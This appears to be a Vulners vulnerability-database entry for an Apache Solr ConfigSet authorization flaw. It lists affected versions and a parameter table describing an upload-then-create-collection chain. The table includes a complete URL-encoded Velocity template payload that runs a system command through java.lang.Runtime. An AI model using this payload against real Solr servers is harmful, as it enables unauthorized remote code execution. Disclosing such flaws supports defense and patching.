[
{
"product": "Apache Solr",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Apache Solr 6.6.0 to 6.6.6, 7.0.0 to 7.7.3, 8.0.0 to 8.6.2"
}
]
}
]| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| action | binary | /solr/admin/configs?action=UPLOAD&name=myConfigSet | ConfigSet upload via API can be abused to bypass protections and enable RCE when combined with other actions | CWE-863 |
| name | binary | /solr/admin/configs?action=UPLOAD&name=myConfigSet | ConfigSet upload via API can be abused to bypass protections and enable RCE when combined with other actions | CWE-863 |
| action | query param | /solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet | Create a Solr collection using crafted parameters that can lead to executing uploaded/configured ConfigSet features | CWE-863 |
| name | query param | /solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet | Create a Solr collection using crafted parameters that can lead to executing uploaded/configured ConfigSet features | CWE-863 |
| numShards | query param | /solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet | Create a Solr collection using crafted parameters that can lead to executing uploaded/configured ConfigSet features | CWE-863 |
| replicationFactor | query param | /solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet | Create a Solr collection using crafted parameters that can lead to executing uploaded/configured ConfigSet features | CWE-863 |
| wt | query param | /solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet | Create a Solr collection using crafted parameters that can lead to executing uploaded/configured ConfigSet features | CWE-863 |
| collection.configName | query param | /solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet | Create a Solr collection using crafted parameters that can lead to executing uploaded/configured ConfigSet features | CWE-863 |
| q | query param | /solr/newCollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3d%27%27)+%23set(%24rt%3d%24x.class.forName(%27java.lang.Runtime%27))+%23set(%24chr%3d%24x.class.forName(%27java.lang.Character%27))+%23set(%24str%3d%24x.class.forName(%27java.lang.String%27))+%23set(%24ex%3d%24rt.getRuntime().exec(%27id%27))+%24ex.waitFor()+%23set(%24out%3d%24ex.getInputStream())+%23foreach(%24i+in+%5b1..%24out.available()%5d)%24str.valueOf(%24chr.toChars(%24out.read()))%23end | Exploitation via velocity template parameters to execute arbitrary commands | CWE-863 |
| wt | query param | /solr/newCollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3d%27%27)+%23set(%24rt%3d%24x.class.forName(%27java.lang.Runtime%27))+%23set(%24chr%3d%24x.class.forName(%27java.lang.Character%27))+%23set(%24str%3d%24x.class.forName(%27java.lang.String%27))+%23set(%24ex%3d%24rt.getRuntime().exec(%27id%27))+%24ex.waitFor()+%23set(%24out%3d%24ex.getInputStream())+%23foreach(%24i+in+%5b1..%24out.available()%5d)%24str.valueOf(%24chr.toChars(%24out.read()))%23end | Exploitation via velocity template parameters to execute arbitrary commands | CWE-863 |
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation